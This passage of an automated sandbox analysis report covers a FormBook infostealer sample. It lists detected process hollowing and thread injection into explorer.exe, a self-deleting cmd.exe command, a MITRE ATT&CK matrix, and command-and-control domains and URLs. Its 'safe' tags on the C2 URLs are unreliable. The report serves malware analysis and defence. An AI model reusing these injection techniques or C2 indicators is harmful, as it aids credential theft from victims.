          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03848EC7 mov eax, dword ptr fs:[00000030h]7_2_03848EC7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038BFEC0 mov eax, dword ptr fs:[00000030h]7_2_038BFEC0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038336CC mov eax, dword ptr fs:[00000030h]7_2_038336CC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D8ED6 mov eax, dword ptr fs:[00000030h]7_2_038D8ED6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038316E0 mov ecx, dword ptr fs:[00000030h]7_2_038316E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038176E2 mov eax, dword ptr fs:[00000030h]7_2_038176E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380C600 mov eax, dword ptr fs:[00000030h]7_2_0380C600
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380C600 mov eax, dword ptr fs:[00000030h]7_2_0380C600
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380C600 mov eax, dword ptr fs:[00000030h]7_2_0380C600
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03838E00 mov eax, dword ptr fs:[00000030h]7_2_03838E00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038C1608 mov eax, dword ptr fs:[00000030h]7_2_038C1608
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383A61C mov eax, dword ptr fs:[00000030h]7_2_0383A61C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383A61C mov eax, dword ptr fs:[00000030h]7_2_0383A61C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380E620 mov eax, dword ptr fs:[00000030h]7_2_0380E620
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038BFE3F mov eax, dword ptr fs:[00000030h]7_2_038BFE3F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03817E41 mov eax, dword ptr fs:[00000030h]7_2_03817E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03817E41 mov eax, dword ptr fs:[00000030h]7_2_03817E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03817E41 mov eax, dword ptr fs:[00000030h]7_2_03817E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03817E41 mov eax, dword ptr fs:[00000030h]7_2_03817E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03817E41 mov eax, dword ptr fs:[00000030h]7_2_03817E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03817E41 mov eax, dword ptr fs:[00000030h]7_2_03817E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CAE44 mov eax, dword ptr fs:[00000030h]7_2_038CAE44
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CAE44 mov eax, dword ptr fs:[00000030h]7_2_038CAE44
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381766D mov eax, dword ptr fs:[00000030h]7_2_0381766D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382AE73 mov eax, dword ptr fs:[00000030h]7_2_0382AE73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382AE73 mov eax, dword ptr fs:[00000030h]7_2_0382AE73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382AE73 mov eax, dword ptr fs:[00000030h]7_2_0382AE73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382AE73 mov eax, dword ptr fs:[00000030h]7_2_0382AE73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382AE73 mov eax, dword ptr fs:[00000030h]7_2_0382AE73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03832581 mov eax, dword ptr fs:[00000030h]7_2_03832581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03832581 mov eax, dword ptr fs:[00000030h]7_2_03832581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03832581 mov eax, dword ptr fs:[00000030h]7_2_03832581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03832581 mov eax, dword ptr fs:[00000030h]7_2_03832581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03802D8A mov eax, dword ptr fs:[00000030h]7_2_03802D8A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03802D8A mov eax, dword ptr fs:[00000030h]7_2_03802D8A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03802D8A mov eax, dword ptr fs:[00000030h]7_2_03802D8A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03802D8A mov eax, dword ptr fs:[00000030h]7_2_03802D8A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03802D8A mov eax, dword ptr fs:[00000030h]7_2_03802D8A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383FD9B mov eax, dword ptr fs:[00000030h]7_2_0383FD9B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383FD9B mov eax, dword ptr fs:[00000030h]7_2_0383FD9B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D05AC mov eax, dword ptr fs:[00000030h]7_2_038D05AC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D05AC mov eax, dword ptr fs:[00000030h]7_2_038D05AC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038335A1 mov eax, dword ptr fs:[00000030h]7_2_038335A1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03831DB5 mov eax, dword ptr fs:[00000030h]7_2_03831DB5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03831DB5 mov eax, dword ptr fs:[00000030h]7_2_03831DB5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03831DB5 mov eax, dword ptr fs:[00000030h]7_2_03831DB5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03886DC9 mov eax, dword ptr fs:[00000030h]7_2_03886DC9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03886DC9 mov eax, dword ptr fs:[00000030h]7_2_03886DC9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03886DC9 mov eax, dword ptr fs:[00000030h]7_2_03886DC9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03886DC9 mov ecx, dword ptr fs:[00000030h]7_2_03886DC9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03886DC9 mov eax, dword ptr fs:[00000030h]7_2_03886DC9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03886DC9 mov eax, dword ptr fs:[00000030h]7_2_03886DC9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381D5E0 mov eax, dword ptr fs:[00000030h]7_2_0381D5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381D5E0 mov eax, dword ptr fs:[00000030h]7_2_0381D5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CFDE2 mov eax, dword ptr fs:[00000030h]7_2_038CFDE2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CFDE2 mov eax, dword ptr fs:[00000030h]7_2_038CFDE2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CFDE2 mov eax, dword ptr fs:[00000030h]7_2_038CFDE2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CFDE2 mov eax, dword ptr fs:[00000030h]7_2_038CFDE2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038B8DF1 mov eax, dword ptr fs:[00000030h]7_2_038B8DF1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380AD30 mov eax, dword ptr fs:[00000030h]7_2_0380AD30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]7_2_03813D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]7_2_03813D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]7_2_03813D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]7_2_03813D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]7_2_03813D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]7_2_03813D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]7_2_03813D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]7_2_03813D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]7_2_03813D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]7_2_03813D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]7_2_03813D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]7_2_03813D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03813D34 mov eax, dword ptr fs:[00000030h]7_2_03813D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CE539 mov eax, dword ptr fs:[00000030h]7_2_038CE539
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03834D3B mov eax, dword ptr fs:[00000030h]7_2_03834D3B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03834D3B mov eax, dword ptr fs:[00000030h]7_2_03834D3B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03834D3B mov eax, dword ptr fs:[00000030h]7_2_03834D3B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D8D34 mov eax, dword ptr fs:[00000030h]7_2_038D8D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0388A537 mov eax, dword ptr fs:[00000030h]7_2_0388A537
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03843D43 mov eax, dword ptr fs:[00000030h]7_2_03843D43
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03883540 mov eax, dword ptr fs:[00000030h]7_2_03883540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03827D50 mov eax, dword ptr fs:[00000030h]7_2_03827D50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382C577 mov eax, dword ptr fs:[00000030h]7_2_0382C577
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382C577 mov eax, dword ptr fs:[00000030h]7_2_0382C577
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381849B mov eax, dword ptr fs:[00000030h]7_2_0381849B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.healshameyoga.com
          Source: C:\Windows\explorer.exeDomain query: www.ikeberto.com
          Source: C:\Windows\explorer.exeDomain query: www.mmgenius.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.114.164 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.93.81.33 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 3.16.197.4 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.directflence.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.booweats.com
          Source: C:\Windows\explorer.exeDomain query: www.tecquestrian.com
          Source: C:\Windows\explorer.exeNetwork Connect: 44.227.76.166 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 185.4.135.136 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.cuntrera.com
          Source: C:\Windows\explorer.exeDomain query: www.rogersbeefarm.com
          Source: C:\Windows\explorer.exeDomain query: www.rainboxs.com
          Source: C:\Windows\explorer.exeDomain query: www.safegrinder.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.nowhealthdays.com
          Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 209.222.96.146 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.nobleandmarble.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeSection loaded: unknown target: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3424Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 11C0000Jump to behavior
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'Jump to behavior
          Source: explorer.exe, 00000004.00000002.906939906.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.655879856.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.908444659.0000000005E00000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000002.919431085.0000000005E50000.00000004.00000001.sdmp, wlanext.exe, 00000007.00000002.908444659.0000000005E00000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.655879856.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.908444659.0000000005E00000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.655879856.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.908444659.0000000005E00000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.673301906.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionAccess Token Manipulation1Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery231Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection512Access Token Manipulation1LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing11Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 412599 Sample: 1cec9342_by_Libranalysis Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 31 www.changethecompany.net 2->31 33 www.blissfulyogamullicahill.com 2->33 35 changethecompany.net 2->35 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 Multi AV Scanner detection for dropped file 2->47 49 4 other signatures 2->49 11 1cec9342_by_Libranalysis.exe 18 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\8t7v9o92aq2mtu.dll, PE32 11->29 dropped 59 Detected unpacking (changes PE section rights) 11->59 61 Maps a DLL or memory area into another process 11->61 63 Tries to detect virtualization through RDTSC time measurements 11->63 15 1cec9342_by_Libranalysis.exe 11->15         started        signatures6 process7 signatures8 65 Modifies the context of a thread in another process (thread injection) 15->65 67 Maps a DLL or memory area into another process 15->67 69 Sample uses process hollowing technique 15->69 71 Queues an APC in another process (thread injection) 15->71 18 explorer.exe 15->18 injected process9 dnsIp10 37 directflence.com 185.4.135.136, 49764, 80 TOPHOSTGR Greece 18->37 39 nobleandmarble.com 209.222.96.146, 49767, 80 RELIABLESITEUS United States 18->39 41 20 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 22 wlanext.exe 18->22         started        signatures11 process12 signatures13 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          1cec9342_by_Libranalysis.exe54%VirustotalBrowse
          1cec9342_by_Libranalysis.exe24%MetadefenderBrowse
          1cec9342_by_Libranalysis.exe83%ReversingLabsWin32.Trojan.FormBook
          1cec9342_by_Libranalysis.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dll26%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dll59%ReversingLabsWin32.Trojan.Spynoon

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.wlanext.exe.3d17960.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.0.1cec9342_by_Libranalysis.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.0.1cec9342_by_Libranalysis.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.1cec9342_by_Libranalysis.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.wlanext.exe.354df80.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          rogersbeefarm.com0%VirustotalBrowse
          www.blissfulyogamullicahill.com0%VirustotalBrowse
          tecquestrian.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.cuntrera.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=oJz4pJjdv4YVSt0+MmS2FtCA6v4cV0g87aIryYx21PY21L+ds7v/9rK+HMpewy0ytB7Z0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.rogersbeefarm.com/or4i/?HFQDEL_8=iur2w+iIhsR226mwIbytM77gwZtRr9g6xSmsh16YEl1oNNyvhmb6qr2bTjtOXqdr6kbB&4h_HCv=a2JDa0Xx22IpWxjP0%Avira URL Cloudsafe
          http://www.safegrinder.com/or4i/?HFQDEL_8=bE8h/5YlyIaGfqFoj5Gnx56lPI3pmXv2ej3H/Ly1qjs4t+LIMarOZaaU3+bG1fp/+sg3&4h_HCv=a2JDa0Xx22IpWxjP0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.healshameyoga.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=br7cblkv9ontd/SiGgT+XZDl5pRbJS2ewUI6yLIzIbkbVffvtcdgNY0Hgbt3ntXhEXSG0%Avira URL Cloudsafe
          http://www.directflence.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=XZ5egFlM4LuR7juc0UFP6fai+XX2I8SV8Ur1Ieq3oNzW4b+OCSm6ABQPGtFRxJXr06kx0%Avira URL Cloudsafe
          http://www.tecquestrian.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=1XIvg6XU5vVZMvk0S+FgKHUoBBBn1K6+BdhisE+/5jtYq3yTMpA8lYHSBxv+eIZJV1A/0%Avira URL Cloudsafe
          http://www.nowhealthdays.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=Nfl9li5qPifS0qmI3oGyYt+1WQBc6+s+CWT3m3ZkN/MuRx1xa905Jr26QEss+PYMzBmi0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.changethecompany.net/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=s0IAE6utMOpEbBTXfVBtMvohtOMhwSGLvfPwlSEa+yA+XVzrnw8OQ7eif0DqkxnFDccR0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
